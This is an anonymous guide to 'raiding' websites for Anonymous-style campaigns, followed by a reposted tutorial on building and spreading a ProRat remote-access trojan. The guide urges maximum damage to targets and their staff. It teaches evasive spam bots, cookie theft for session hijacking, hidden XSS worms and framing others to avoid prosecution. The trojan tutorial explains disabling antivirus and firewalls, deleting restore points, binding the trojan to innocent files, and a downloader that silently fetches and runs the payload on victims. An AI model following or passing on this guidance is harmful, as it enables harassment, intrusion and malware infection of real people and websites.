A Complete Hacking Tutorial
Anonymous guide on how to be a /h4ck/er on steroids.
---> Read this file top-to-bottom
•••Preliminary•••••••••••••••••
••••What•this•guide•is•••••••••
••••What•this•guide•isn't••••••
••••Target•Auidence••••••••••••
•••Programming•••••••••••••••••
•••Rules•and•Protips•••••••••••
••••/i/nsurgent•protips••••••••
••••/h4ck/er•protips•••••••••••
•••Professions•••••••••••••••••
•••Basics•••••••••••••••••••••
••••How•Computers•Work•••••••••
•••••Languages•Control•All•••••
••••Networking•Basics••••••••••
•••••IP•Addresses••••••••••••••
•••••TCP/IP••••••••••••••••••••
•••Raiding•9001••••••••••••••••
••••Websites•••••••••••••••••••
•••••HTTP•Botting••••••••••••••
•••••Session•Hijacking•••••••••
•••••XSS•••••••••••••••••••••••
•••••Breaking•Captcha••••••••••
•••••Phishing••••••••••••••••••
•••••DoS•••••••••••••••••••••••
••••••Weak•Spots•••••••••••••••
•••••R00ting•••••••••••••••••••
•••••Stealing•Information••••••
•••Resources•••••••••••••••••••
••••Tools••••••••••••••••••••••
••••Links••••••••••••••••••••••
••••Reference••••••••••••••••••
•••Closure•••••••••••••••••••••
•••••••••••••••••••••••••••••••
TODO:
Create a long list of keywords to learn
add how to cover tracks
Raiding 9001
-cover exploits regarding php/.net/j2ee/old CGI (c/perl)
*j2ee developed applications are pretty secure, but definetly cover this
*note to newfags: the extension doesn't garauntee what the platform it was
developed on. j2ee rarely ends in .jsp because the servlet usually forwards
to its context root "domain-url/Example" instead of "domain-url/example.jsp".
•••Preliminary•••••••••••••••••
Anyone can pick up and write to this file, don't drop names into it otherwise
it'll just get sage bombed. Any edits you put into there, submit to a new
thread and let ppl in /h4ck/ go over it to make sure it isn't wrong/or just
stupid.
••••What•this•guide•is•••••••••
-How to help an /i/nsurgency using techincal expertise
-Again, how to help an /i/nsurgency as opposed to personal vendettas
-Again, HOW TO FUCKING RAID teh internet, so its focused on websites
-if the terms like "lurk moar" for example confuse you, then this guide
won't help you, try:
http://www.google.com/search?q=%22how+to...2&ie=utf-8
PROTIP: If any links are broken, learn to waybackmachine/google.
••••What•this•guide•isn't••••••
-hOW tO bE a HaCkEr
-rooting. This is not another how to root guide but it will cover that for
newfags. Rooting != win. rooting will last for 2-8 hours. A well thought out
attack causes days worth of damage in data lost, and weeks of labor lost.
-any words like script kiddies or any other retarded shit you will hear people
on blogs/digg/fag dominion talking about. Funny how the biggest namefags
who love to talk about hacking the most 1) rarely hack or 2) never hack.
Its also funny how the later of the two write 90% more than the prior of the 2
-linux based. linux != hacking. knowing linux is helpful if u want to hack into
linux boxes. You have probably read other guides and noticed how they keep
reiterating that you must somehow use only or be a linux guru in order to hack.
That is just incorrect, however you will need to know some how to use linux
and be rather profecient in it as it would be pretty fail to not know linux,
then hack into a linux box using some script and then not know what the fuck to
do.
••••Target•Auidence••••••••••••
-if gb2/gaia, gb2/bed, or yiff in hell offends you, kill yourself. Anyone who
is a weaboo fag or jerks off to furry shit clearly doesn't have the capacity
to hold a non-remedial job let alone utilize techincal expertise.
-you need to be able to program, if you can't, then refer to the paragraph below.
-we are a legion of h4ckers, many of us are IT
proffesionals/comp sci students (in b4 CS III).
You'll probably end up on that path anyway, why
learn to program then not make good money at an ez
job am i rite? YOU THERE. WHAT IS YOUR PROFESSION?
-If you want to know the answer to "I have an IP what can I do with it"
this means that you don't understand computers very well
and need to learn some more before you attempt to give
out any expertise... Read the next paragraph and after
you do some learnin come back. You'll need to keep reading
shit and never stop... try to spend as much time on your
learnins as you have put into your faggot MMOs? Also
skip to the Basic section and read that before you program.
•••Programming•••••••••••••••••
if (!notProgrammer || (pLangauges.size == 1 && pLanguages.next() == "php")
|| shitpilenewb) {
If you can't program you will never know shit. You won't understand how any
exploit which you prolly /r/ but don't even fucking know why. l2/program and
LEARN IT GOOD + you will never stop coding once you do. When you see exploits
being mentioned, in the back of your mind you will understand exactly what it is
doing and how it works. Understanding and after that, knowing, IS THE EPITOMY OF
HACKING. You will never know shit unless you learn how computers work.
~^~
Learn a non interpreted language first. Rather, just learn C or C++, Java.
These languages are turned directly into machine code, which is then fed to
the CPU as opposed to a script, which is interpreted by a program. You will
need to learn about the stack, and other common programming topics so get a
good book. If you really want to be good, learn ASSEMBLY and learn how C/C++
is converted to assembly. Remember this:
High level language -> Intermediate language -> Machine code
an example:
C -> Assembly -> 01001010 <-instruction
i++ -> INC [i] -> 01001010 10001010 <- EXAMPLE,was too lazy to refer to *correct*
opcode so don't be a wise ass if you did refer and found the 0's and 1's were
completely wrong, because they just an example and I'm lazy.
Java works differently, yet you will prolly learn it in college. VB is not
helpful, it isn't like other high level languages. Do not learn it.
protip: c#, Ruby on Rails, J2EE and php will not help you learn computers/how to
program anything good. They are highly detailed in helping developers create web
applications. If the idea of *creating* a web game or forum interests you then
learn these as they will automize and make a lot of the programming required for
web development easy. Learn these afterwards though they are needed to
understand how web applications work.
~^~
WHAT THE BOOKS WONT TELL YOU YET WHAT IS MORE IMPORTANT:
-It is all about source code. You learn from source code. After you get the
basics down just google '"source code"+language'. Look at any programs that
interest you. basically, Read a little, write a little, REPEAT. This is what we
all do, no matter skill level.
-Every language has a common library for handling Strings, threads, etc. Some
pretty common code. You WILL need to know this just as good as the syntax so
quickly find the API reference for these. Fuck it here they are lulz:
http://java.sun.com/j2se/1.5.0/docs/api/ - java obviously
http://www.cplusplus.com/reference/ -c++
-LEARN TO FUCKING GOOGLE! This isn't because you annoy others, if anything ppl
enjoy strobing their e-peen to help you. But, listen. As paid software dev
I, and everyone of us google shit at work. Why? Because when you are a
programmer you REUSE code, and you want to find other libraries which already
work well and are very extensive. Whenever you get an error, type it into
google and you will get information pertaining to it.
-Only reason I recomend books is because they SHOULD tell you about the stack
and how computers work in general.
After you have read all of that, can you write a program that visits a webpage,
grabs all of the links there, and visits one of the pages in there? Then steal
all the emails in the page (as it looks for links). Then code it so that it
scans for forms and logs wether or not it found one and what the url was. If
you didn't write good functions (modular code) you still need to learn that or
else you won't be a good coder. Once you have this project up and running, and
can easily make changes (ie: easily add new functionality) to it then you can
move on.
Oh, and one more challenge: learn what the stack is, and then read this and
attempt to understand what a buffer overflow exploit is. These are very common:
http://www.cs.wright.edu/~tkprasad/cours...phOne.html
hint on what stack you want to read about:
http://en.wikipedia.org/wiki/Stack_(data_structure)#Hardware_stacks
^as not to confuse you with the abstract data structure.
Of course, if you choose java you still need to learn pointers.
So, finish both challenges before you can move on. DO IT FAGGOT!
tl;dr: learn java or c, then assembly and then stick to those for a while
} else {
so you can program? doesn't mean jack. You need be able to think creatively.
You need to know the "time of day", (hint: its always RAPE). Knowing what to
program is what you need to focus on no matter your skill level.
Other languages and stuff to learn:
Because we hit websites so much, you need to learn HTML and some
javascript, and css. Any other programming languages will be very similar
and learning them should only take 2-4 days. You should also understand TCP/IP
basics, proxies, socks, and HTTP is very important. Also learn binary (its a
number system, just like decimal... also learn hex, again an number system, not
something that you edit with a hex editor).
}
•••Rules•and•Protips•••••••••••
••••Rules••••••••••••••••••••• •
1) Do not namefag. Do not trust namefags. You need 7 proxies, but you'll need
9001 handles. Use a new handle AND proxy often. An internet handle is
as good as your FULL NAME and DOB once they do find your indentity. Going
around putting your handle in sploits or coding a bot then posting the link
in the channel with the SAME name over and over means you're a fucking
retard. WE ARE FUCKING CALLED ANONYMOUS FOR A REASON.
2) MODS = FAGS. This applies to ircops and channel ops. Do not "work your way
up" the hiearchy (hence don't namefag). I don't have anything against
these people other than their general name faggotry. We found out the owner
of partyvan IS A G-A-I-A FAG during a raid. Don't trust mods and nevar trust
a namefag.
3) Contribute solutions with the goal of "Getting the job done". Raids need
coders. Some of it it common shit like a bot that spams shit on forums or w/e
messaging. The idea is to take the best strategical course of action. Find or
start a project which will either result in absolute lulz or rape (hence
"whatever works, whatever gets it done"). The idea is to maximize rape, not
grow an e-peen. If you don't be a namefag then growing an e-peen won't
factor in, and you'll understand how important contributing is.
••••/i/nsurgent•protips••••••••
*) Switch your name often, you are anonymous. If you want attention or have some
other pyschological needs you can join g00ns. Nothing against them but they
will offer you what you want so that you don't douse decent lulz worthy raids
with your general faggotry.
*) Proxy now instead of later. Even though no shit will happen to you by just
entering a channel if you later decide to do something illegal, then keep the
same fucking name you logged in with that links to your ip, which your ISP
will be able to link to your SUBSCRIBER ACCOUNT/BILLING ADDRESS then yeah,
you're a faggot and deserve jail raep.
*) Contribute and post screen shots on teh chans + talk some. If anyone kicks
you, show them your screen shots of lulz.
*) You do not need to be an ircfag. Ideally you wouldn't be lurking there at
all and all of your work should be posted to boards but the irc is
effecient. Would be very hard to talk, collaborate and have good intel on a
chan.
*) Do not worry about "working your way up the irc channels/mods." Infact, you
shouldn't be doing that at all. If you are looking for social
interaction/importance then gb2/gaia. Also, if you are from gaia or are just
a fag in general and are looking into this because you think it's "trendy",
you will be doxed in matter of time, could be as soon as a week, or later in
a month, 3 months, eventually, if you don't gb2/gaia and stay there.
••••/h4ck/er•protips•••••••••••
If you think rooting = the ultimate hack then you're a shitpile n00b. If
you want to make an impact, and lulz over what a group, communitty (fags) and
company had to put up with from what you did with your keyboard then this
guide is for you. Also, this isn't a pissing contest. Nobody gives a shit about
how good you may or may not be. Also if you are anonymous, this wouldn't apply
because in effect, you don't exist, but your work does.
*) Blame it on a namefag. Anything you write, claim credit for it, using
someone elses name. Party van tracks us the same way we dox faggots:
tracing aliases is step #1. Afraid that your exploit will cause enough
monetary damage to warrant an FBI investigation? Hop onto the partyvan irc
find a random namefag there and blame it him for teh lulz.
*) Do collaborate with other h4ckers and learn from them. Share source code at
your own descretion. Also you can offer help if you know a lot about a
particular field (ie: if its your irl job or something you happen to know
the ins-and-outs of).
*) Learn how to hide your tracks and the internet fucking works before you
start talking, let alone doing anything illegal. Learn how proxies do
give you secruity, yet can be compromised. Learn how Tor works.
*) Don't read from white hat websites. These are shitpile havens for idiots.
The problem with most people is that they want to appear smart, but only for
the sake for impressing others. Most of their shit is later proven wrong (as
it eventually has to be since they go around informing too many shitpile
noobs who believe everything at face value and can't fucking learn how to
filter out noise-to-content). Most of the websites are making money off of
adsense, if that helps you at all. DO ORIGINAL FUCKING RESEARCH AND TEST YOUR
OWN WORK AND IF YOU CANT LEARN HOW TO FILTER OUT SHIT FROM GOOD THEN YOU WILL
NOT GET ANYWHERE.
•••Professions•••••••••••••••••
People are only good at what interests them so pick one or several you like.
Someone else can flesh out moar professions here. Again, profession != skill.
Skill is up to you and your creativity. A simple programmer can beat out a
software engineer if he is more creative.
Programmer
\
\
Software Engineer
|
|
Vxer
Programmer
-Understands a programming language, hopefully C or Java
-Can help with writting some tools, but fails to understand how to
code some things or needs help.
-Can read source code of tools and understand them
-Should be reading a lot of source code to become better
Software Engineer
-Able to create tools for raids. Very helpful, somewhat common
-Able to find simpler exploits, such as XSS
-Able to exploit the already discovered
VXer
-Highest level of Coder, a virus writer/GOD
-Knows Assembly very well. Works from the lowest level, most difficult.
-Able to reverse engineer software and discover trade secrets and exploits
-Can discover software exploits well/buffer overflows/good ones
-rare to non-existent. Needed, but most difficult.
This is just to give you an idea of whats out there. This is in no way some
kind of theory or application.
•••Basics•••••••••••••••••••••� �
At this point everyone knows how to program. Don't be concerned if you are new
and you still have more questions. This part of the guide will be the last to
teach and cover basics. Often times the problem in /h4ck/ is that there are
questions from noobs who just don't know computers or networks work in general.
Knowing how to program is the only way to understand how computers AND networks
actually work. There are some basics that are needed to be covered.
••••How•Computers•Work•••••••••
If you are really new, just google it and read a simpler guide b4 reading this.
Everything occurs at the CPU, essentially. And it is sequential; one at a time.
NOTHING on your computer runs simultaneously, even on dual processing because
one of those CPU's has to wait for the other to finish :P. It's simply breaking
up what one CPU would have done anyway, ONLY IF the programmer designed it for
duo core (threading according to that architecture). Often times you can hit
ctrl + alt + del and see a process like a game consuming 50% of your CPU
because that game, like most every other program to date isn't designed for duo
core. ANYWAY, back on subject:
Everything in the computer occurs in steps of finite time, ONE by ONE. This
time is known as the system clock, which runs at a certain Mhz. Let's say its
133Mhz. However the CPU runs faster, yet on the same clock speed. How? It runs,
as set in the BIOS (check yourself), at a multiplication factor of the system
clock. So say it runs at 9x (system clock), or 9 x 133Mhz = 1297 or 1.3 Ghz. So
the CPU can do 9 operations before System bus (which runs at the speed of the
system clock) will be accessed (if needed) to get something from RAM, an HDD, or
a device. As a computer user, the only thing you ever do on a computer is play
around with the CPU, using an application to do this for you. THE CPU then
reads/writes to every thing else in the computer... the CPU controls the rest of
the computer. As a programmer you control the CPU much more closer. Obviously
you can't do shit on a computer if you don't understand it, and you can see
where programming comes in as a need to know. Also, multiple programs ONLY seem
to run on a computer simultaneously, but they are, in reality, being given a
small fraction of time to run, in a priority queue, then kicked off the CPU by
he OS's CPU scheduler, given to the next process in line. For the noob,
process = program. Program = simple user level talk.
The goal of any hack is to get access to the CPU essentially. Obviously root or
and admin account would be prime access to run the best applications BUT if you
can inject your own code in there during a user session (often called shell code)
to give you such an account or higher level system privelage then you are in.
•••••Languages•Control•All•••••
A non-interpreted language is compiled directly into executable objects. These
are files, often in a particular OS format (Like PE Format for windows). Within
this format will be the .text session which contains all of the CPU
instructions. This object file, like a .exe on windows, is loaded and given its
own id and the CPU scheduler determines when it will be loaded in. System
processes are given higher priority, but they pretty much take turn. Windows
uses a 32 priority queues. The top 16 belong to system processes. The secheduler
starts with the highest number queue and works its way down until it finds a
process that needs to run (its status will be set to waiting, as in its waiting
to be ran on the CPU.) Otherwise its status will be blocked and it won't run
on the CPU because it doesn't need to. Also it could be waiting for I/O, which
is relatively VERY slow compared to the CPU. This is where multi-threading
comes in. One thread will do I/O so that the entire process isn't blocked. This
is how a good DoS tool works too, so that it doesn't do 1 crapy request at a
time, but uses many threads for each I/O.
The only way you will do anything on a computer is through a process. If you
can't write processes, or engineer your own code into one (buffer overflow),
then how you can ever claim to be a hacker? There is no flashy program that
"hacks", or even a command line tool. And linux has nothing to do with hacking
other than the fact you need to know what the fuck to do on a linux box provided
you get into one. Would be pretty fail if you get in but have no clue as to
what to do. And an OS is all code just the very same way a process is, save
for the fact that it is the process which is originally loaded, and takes
complete control over all of the computer and only allows other processes to
run on time-shares.
As a hacker you will always need to do something tailored to your needs, there
is no already precompiled solution for everything. And why wouldn't you prefer
your own control over the computer instead of an application? Users are forced
to use applications in order to get the computer to do what they need. A hacker
forces the computer to do what he/she wants it do do based on his/her wants.
Of course you are never to re-invent the wheel if what you are doing is
sufficient to something else already done, however often times the task at hand
holds intricate requirements. For example if you're installing a virus on a
machine that you want to it to initiate a DoS at a certain time (maybe
whitehouse.gov? :S), you should definetly use a module somewhere already written
for that, provided it doesn't trip any AV. No point to re-write something so
simple and obviously something incribly modular like that.
••••Networking•Basics••••••••••
Protip: A server is a process running on a *PORT*. The service running on that
port is a server. Colluiqally a server is a machine, techincally it is a
service that a client connects to.
Basically, it is just: computers running routing software (aka: A ROUTER!) +
DNS lol.
The internet is a network of networks, interconnected at certain high volume
areas. If you and your neighbor are on the same ISP then when you connect to
his pc for a game or w/e then you only hop to routers located within that
network. Subsequantialy your traffic will never leave that town. However if the
same neighbor was using a different ISP your traffic would prolly be routed to
DC, New York, LA, Atlanta, etc some major city where the two ISPs can be
traversed there.
•••••IP•Addresses••••••••••••••
Again, the internet is a network of networks. These networks are inter-connected
(hence internet!) via routers. Networks like universites and ISPs, which then
are routed to much larger networks like level3 for example. The way an IP
address works is yes it is like the "virtual address" of your computer. But
here's whats worth noting... An IP address is routed (obviously by routers) to
its destination based on the IP number itself, and of course the router's
following of TCP/IP (using routing tables).
Certain organizations are granted blocks of IP addresses, for example Havard
was granted the entire 128.xxx.xxx.xxx (class A) block awhile ago. This
obviously isn't done anymore. Routers will forward packets based on the
destinatino IP address until it gets closer and closer. Examining the class
A.B.C.D needed. Techincally you can setup your own home network and give your
machines whatever IP you want, packets will be forwarded based on your routers
tables. Obviously this network and its current configuration will never be
asked by any other admin from another network if they want to connect the two.
A LAN, still running on the same TCP/IP protocol that the internet uses will be
use internal IP addresses to route its traffic. These IP addresses are in the
format of 192.168.x.x. These do not and are not routble on the internet, they
are reserve to route to local area networks. So yes, behind a network when you
want to connect to something like 192.168.1.2 you might connect to a printer
setup on your home network (if your printer is configured to be accessable over
the network, and obviously it will be physically connected to a router...). Most
people are given a router/modem combo from their ISP, thus this paragraph
explains why your IP address appears to be 192.168.x.x instead of whatismyip.com
will tell you (which is the external IP address of your router). It's internal
IP address will be in the format of 192.168.x.x. Learn more about ARP to get the
full picture.
•••••TCP/IP••••••••••••••••••••
TCP/IP is a suite of protocols. Keep that in mind. It encompasses ones you have
most likely heard of: TCP, UDP and IP. Also, IP Address = part of the IP
protocol; they follow it and pertain to the rules. Routers do the same so that
they can read IP Addresses and forward them correctly.
Read a book on TCP/IP. You can sorta skip the ISO network stack and focus on
TCP/IP part. Basically, the tl;dr version:
[Phyiscal layer][Link Layer][Network Layer][Transport Layer][Application Layer]
This describes how data is sent in packets. Each packet has the following
layers. Each layer is built in order for each part of the network to forward it
to its destination. These layers break up the packet, since it is just data,
hence why its called a datagram. Each layer is added by the appropriate
software.
Now to explain the layers in the order that they are *READ*:
Physical Layer - This layer is read by equipment that telecom companies operate.
Like switches, trunks and other boxes in CO stations. We don't really delve into
this here :S
Link Layer - Typically This is used for how data is transmitted over an ethernet
cable. Router can read this, use the MAC address (every device connected to a
network has a MAC address, not just NIC cards). This layer contains the MAC
address.
Network Layer - This is THE IP layer. It contains the destination IP address and
source IP address (your IP address). This is what routers will read in order to
forward your packet over the internet). They will read and replace each Link
Layer inorder to forward them to a the next router, but while any packet is on
the internet, this packet is not replace, but it is definetly read at each
router. Again, IP Address = THE TCP/IP protocol. Rather, one of the
Transport Layer - Typically either TCP or UDP. This layer contains information
relevant to the connection. This layer contains the port number, and is only
needed to be read at the destination's machine TCP/IP software. However "deep
packet inspection" can read this, as well as NAT-routers which have to read it.
Anyway, TCP is the connection based protocol, UDP is completely connectionless
alone, unless the application simulates a connection using its own rules. Just
read over these two in a book, you'll get the complete understanding + PICTURES.
Application Layer - The application layer is JUST data for the program that uses
the said connection. This data is the content of the connection. The application
writes whatever it wants to to this stream and reads all content from it just as
though the two weren't connected to the internet. This is how the Layer approach
strictly divides and SEPERATES data so that things run smoothy and simply.
•••Raiding•9001••••••••••••••••
Internet Hate Machine + techincal expertise = ???
Most likely a website raid. This is not a PA how to hack your ex-gf/stalked
victim's PC. You prolly don't even have the capactiy to do such anyway :S
But that doesn't mean PC hacking is off limits. If you can hack a website's
webmasters, developers or mods PC and procude MUCH lulz. The sky's the limit,
after all... so nothing is off limits, ever. As an /i/nsurgency we focus on
websites, so keep that in mind.
••••Websites•••••••••••••••••••
The target is not a web server. The target is the target and anything related
to said target. This includes the web server, the staff, the communitty. Also,
rooting != the end all win, not by a long shot. It will last for a couple of
hours and be patched up, but none the less its pretty win pyschologically. The
goal is to cause as much damage as possible, rooting can be done, but it is
garuenteed that there are other more actions that will cause much more damage,
and lulz than an attack lasting only for a couple of hours.
You will really need to know some basic TCP/IP, completly know HTTP and know
HTML, and some basic javascript. The js is to help your emulate incase the
js is redirecting or modifying something that will end up in a POST request
AND for XSS obviously.
•••••HTTP•Botting••••••••••••••
Highly effective against online communitties. These drive the owners, members
and devs fucking crazy, costs them a lot of money, and is a constant annoyence.
From viewing Moderator forums that a fellow anon hacked in, it was seen that
the devs and mods f-u-c-k-i-n-g hate bots. So, when raiding, BOT every thing
you can. Always bot the content reporting systems to fuck their ability to
report shit up! They will respond with adding a captcha = also win. Then move
onto other things, such as their forum, and whatever else can be spammed.
Be sure to write RE-USABLE code so that when you from one system to the next,
you can write each spammer (which is an HTTP Bot) quickly and easily. Hint:
Use object oriented programming, and have an HTTP Bot class which can be
extended easily.
The steps to botting are fun and simple. Also, provided there is not a very
complex CAPTCHA, YOU CAN BOT ANYTHING. As long as your browser can do it, you
can bot it. Because botting is just emulating your browser. If you ever run into
a problem its because you are not emulating the web browser closely enough. Also
allow all of your bots to use tor or some other user specified proxy.
0) Learn HTTP. Read up on this protocol, you'll learn a lot of need-to-know shit
1) Emulating the target service. Run IE, clear cookies (because your bot prolly
won't save cookies once it closes (it will save them and use them of course),
and of course, your bot will not initially have any cookies the first run
anyway. Now run Fiddler2. Examine the request and responder headers. Ignore
any SSL (port 445), images, css. But take note of HTML and JS. Don't read the
HTML lol, just copy and paste it into a new .html file on your computer to
quickly view it or use Fiddler2's integrated browser. SAVE this for later use.
2) Now that you have mapped out the details, begin coding. You'll want emulate
any POST requests, find the post parameters and anything in the query string.
This is how u emulate your requests. Also try to copy certain HTTP request
headers, like referer, user agent, and the one that says "Form encoded" is
imporant. However, you should be using something like Mechanize (for perl), or
Apache Common's HTTP Client (for java). Something which takes care of handling
cookies and emulating a lot of the browser. You won't need to set a lot of those
headers because you need to use something like the prior mention to do that for
you.
3) Run your bot, but set your program to use an HTTP Proxy, running on port
8888. This is fiddler2, you'll want it to connect thru that so it can read your
bot. Than compare this with your saved copy and see where you are not emulating
correctly.
4) Maintenance - If the target website changes something to break your bot, you
will want to use fiddler to see where you bot doesn't correctly mimic IE, by
comparing the two Fiddler sessions (1 from IE, and 1 from your bot). Otherwise
if they added a CAPTCHA you win. Next would be breaking the captcha OR writing a
tool which automates captchas so a fellow /b/tard can solve them to produce lulz
Ideally if you can write this as a web app so ppl can just visit the web site
instead of d/l something that would be pretty win. But CAPTCHAs are becoming
broken more and more every day so look into that.
5) This isn't the fitth step but, rather a note. You will want your bots to be
multithreaded. If they aren't they will only be able to spam one at a time. If
they are multi-threaded, you can load several accounts in at a time.
Finally you will want to create an auto captcha program. This will bot targets
user registration system and allow you to only enter 1 captcha to create a
program. Eventually the target might start to check that client isn't running
a proxy on port 80, or port 8080. As well as begin ip b& automatically after
a certain number of registrations. In this event, you will need to have a LARGE
list of GOOD proxies that you can server up on a web server so that your
spammer programs can call this list and get a fresh proxy server. You can use
a combination of web spiders and wget to build your own proxy list. Also at
the time of this writing, there is a current anon project related to just this.
Hopefully it will be up indefinetly.
•••••Session•Hijacking•••••••••
-grab cookies
-simple take all cookies (just a string), and use Modify Header firefox
extension to login as victim
•••••XSS••••••••••••••••••••� �••
-XSS basics
-make sure to hide xss from devs
*Do not ever submit xss in the form of Alert("whatever"). any user/dev will
find this and fix it. Use a combination of grease monkey/FIrebug to set
arbitrary DOM objects to arbitrary values that you can test are set. Refer to
tools at bottom of this file.
-XSS worms
*an xss worm is one that uses JS to redploy itself. EX:
Take a social networking website that has an xss exploit:
The exploit allows the attacker to run whatever javascript they want to. so,
if they use JS to direct their browser to send a message to someone, or they
implant the js into their profile it will spread like a virus. Then give it
a timed or triggered payload and BAM, CP on everyone's profile page!
•••••Breaking•Captcha••••••••••
-Some captchas = shit
-others are good, like google (yet all are breakable)
-Use erosion to filter noise (eats away pixels with little density)
-convert to binary image (black and white only)
-segment (pull each letter out)
-if the words are complete words, use dictionary.com (open an http socket
obviously...) to improve accuracy.
•••••Phishing••••••••••••••••••
-use previously written spammers on target website to profiferate links.
•••••DoS••••••••••••••••••••� �••
Really need GOOD information on DoS. A lot of retarded shit out there.
•••••••Weak•Spots•••••••••••••••
Weak spots to focus on besides just Bandwidth and network software.
ex: searches can tap the CPU harder.
weaklest link theory: The is a bottleneck somewhere. Find it and exploit that
area. If attacking hit the weakest area, thats fundamental to every attack,
so it goes with DoS too. There are people whose job it is to tie up these
weak areas. This part of text file needs to go over how to find them.
Like with teh subeta raid, and how they used the forgot email service.
•••••R00ting•••••••••••••••••••
Need a good guide on this
•••••Stealing•Information••••••
Using wget to steal thousands of yahoo emails and any other
infromation to spider-bot out of them.
•••Resources•••••••••••••••••••
For the shitpile noob: NO THERE ARE NO FLASHING PROGRAMS THAT HACK SHIT. THERE
ARE NO COMMAND LINE PROGRAMS THAT WILL HACK SHIT LIKE FROM WHAT YOU HAVE SEEN
IN A MOVIE. YOU HAVE TO ENGINEER SHIT, THESE TOOLS ARE FOR ENGINEERING.
Also, the /h4ck/ board should be a good resource if you can initiate a good and,
thought provoking conversation about something you have questions on but just
don't get from what google tells. Sometimes the answers are out there but they
are too good to be simply found on google + too many idiots have websites that
can really create a high noise to content ratio, making any good infomration
very well hidden. Plus anything you ask which is good can be seen for others
who hopefully had the same question, even someone more expereince may brush up
on a certain topic posted. But, do not ask stupid shit pile questions like
"what can I do with an IP," or ANY windows support questions. Support type
questions like "how do i configure [hacking related tool] to do ______" are
fine.
••••Tools••••••••••••••••••••• •
Fiddler2:
Great HTTP Debugger (the best + free too). It runs as a local HTTP Proxy in
so that it can read your http connection. This is completely transparent and
your connection is no different, other than the fact that you can read it as
well as decrypt HTTPS connections that you normally wouldn't be able to. Your
browser will give you a certificate warning. To use this HTTP Proxy with FF and
more importantly any http Bots that you write you will need to configure them
to connect to an HTTP proxy running on port 8888.
Firefox Addons:
Modify Headers:
You can use this to modifiy the "Cookie" header if you steal someone's cookies
from a login based website and you want to login to that session.
Firebug:
Find the DOM inspector. Also, lots of helpful tools that are needed. A personal
trick of mine for finding XSS is to have the JS set some random object you see
in DOM to something like 555, then use Grease Monkey to check if that value is
equal to 555 and have your greasemonkey script do an alert("XSS found"). BECAUSE
YOU DO NOT WANT THE ENEMY DEVS TO FIND YOUR XSS.
http://www.checker.freeproxy.ru/checker/index.php:
Proxy Checker
••••Links••••••••••••••••••••• •
The following links have been checked and cleared for not containing stupid
shit. That is, you will not become more of a retard by visiting these websites,
unlike certain websites. Whats worse than not knowing is thinking that you know
something, having spent time learning it, and just being a fucking retard for
having believed it at face value and been spoon fed utter crap, then sharing it
and passing it on as "real inforomation" to others. So, here be good links,
don't edit in links from crap websites with utter shit:
http://vx.netlux.org/
Great website for VX scene. rather, the only one lulz.
http://vx.netlux.org/lib/static/vdat/ezines1.htm
mostly old zines, but some good reads
http://www.textfiles.com/
again old, but might as well go over some history
http://www.phrack.com/
http://img.7chan.org/pr/
••••Reference••••••••••••••••••
http://www.googleguide.com/advanced_oper...rence.html
Very useful reference.
•••Closure•••••••••••••••••••••
Last tips to reiterate:
-you must know how computers/networking work. You must learn how to program
for that to happen since OS = software. What you want to hack = software.
-stop reading white hat websites for any information. Do your own research.
-do not work your way up the irc. MODS = FAGS
-stay the fuck anonymous.
In the end, Anonymous is for hackers, other than solo. The two just fucking go together. Don't
ruin it with namefagging and don't ruin your life in jail because you made a
mistake. Party van dox people just like we do... start with a screen name. But they
have access to much better infos than we do.
As for the party van... and all other namefags who write disclaimers regarding
their text file as being for educational purposes only: Fuck em.
We are Anonymous.
We are Legion.
We do not Forgive.
We do not Forget.
A Complete Hacking Tutorial
Posted at Monday, July 28, 2008ProRat Tutorial (Create Trojan)
Posted at Monday, July 28, 2008ProRat Tutorial (Create Trojan)
*Necr0tox1n's Prorat V1.9Fix2 Tutorial
First thing's first, you'll need a clean copy of Prorat V1.9 here is a link where you can get it from.
http://www.megaupload.com/?d=QNR1BZ3G
This file includes:
ProRat V1.9
The english help file
Skin packs 1-5
The skin builder
pass: netcrew
password for prorat v1.9: pro
Now you have the necessary files, let's start with the tutorial. Extract ProRat V1.9 and run the ProRat application. We'll start with a ProRat server. Click create near the bottom and a small context menu will come up, for now let's just make a ProRat server, we'll cover the other types later.
The ProRat server is the server the rat communicates with, all the fun trojany things :P
The setup is pretty simple we'll start with the notifications area.
Pro connective notification-
this is basically the SIN notification. Where it asks for you ip address just click on the little red half-circle on the side and it will locate your external ip address for you.
Mail notification-
self explanitory, the server will send you an email to tell you the victim has been infected.
ICQ pager-
If you use ICQ you can be notified of infections via that, put in your UIN and when a victim is infected you will be informed via ICQ
CGI-
This connects to a web cgi page and uploads the information when a victim is infected
Choose whichever you like, I usually use email and SIN (Pro connective.)
Ok let's move on to the general settings now.
Server Port-
the port you run your server off of (default 5110) For the most part you don't want to use the default port
Server password-
Pick a password insure only you have access
Victim name-
nothing very important, just so you can send separate people separate servers and be able to identify each, use whatever you want here
Give a fake error message-
when the server is run it displays an error message. You can edit what it says by clicking configure after checking the box.
Melt server-
After the server is installed the server installer is deleted if checked
Kill AV/Firewall-
when the server is run it kills the Anti-virus and Firewall processes to hinder detection if checked
Disable win Xp SP 2..... -
This kills the windows firewall upon execution if checked
Clear windows xp restore points-
This will delete all system restore points to avoid repairing the infected computer if checked
Don't send LAN notifications-
this disables notifications if someone within your network is infected, notifications still work from outside connections just not on LAN if checked
Invisibility-
All three of these settings help to hide the server from the user. I'm not going to explain them, I'll just tell you to leave them all checked
Bind with file-
Allow you to choose a file to bind the server to (this helps prevent detection)
Server extensions-
Pick the extension type that you want
Server icon-
Pick an icon
So you've set all of your settings, now click on create server in the bottom right corner and wait a few moments while the program builds the server. Go find some suckas that will run it and give them the file.
Now back at the main window of ProRat we're going to click on the little check-box next to the R on the bar up top. This step is unnecessary if you didn't use the pro connective notification. This listens for the SIN notifications
Put in the IP address of your victim and the port the server runs on and click connect, you'll be prompted for your password.
Now instead of walking you through this, this is the fun part, playing with your toys, I'll tell you what not to try if you are doing the testing on your own PC
CHAT-
Do not attempt this unless you are prepared for a reboot or you are testing with a server on one computer and the client on another.
FUNNY STUFF-
Avoid close monitor because you won't be able to see what you are doing.
Same with open screensaver
ok these ar the informations about the other server types
Downloader server-
(copy pasted from prorat, sorry I'm really tired)
Downloader server's aim is to infect the victim in an easy way. ProRat server is 350 kb but Downloader server is just only 2kb. It is easier to send to your victim.
Downloader server's job is to download and run the real server on the target PC. It downloads the real server in a fast way and executes the file without asking any questions to your victim. When Downloader server is binded with a file, the files size won't be too much big so your victim will not get suspicious with the size of the file.
If you want to use Downloader server you must have a web hosting and you can also use a free hosting. After this you must create a normal server and put it into your web hosting area.
Lets say :
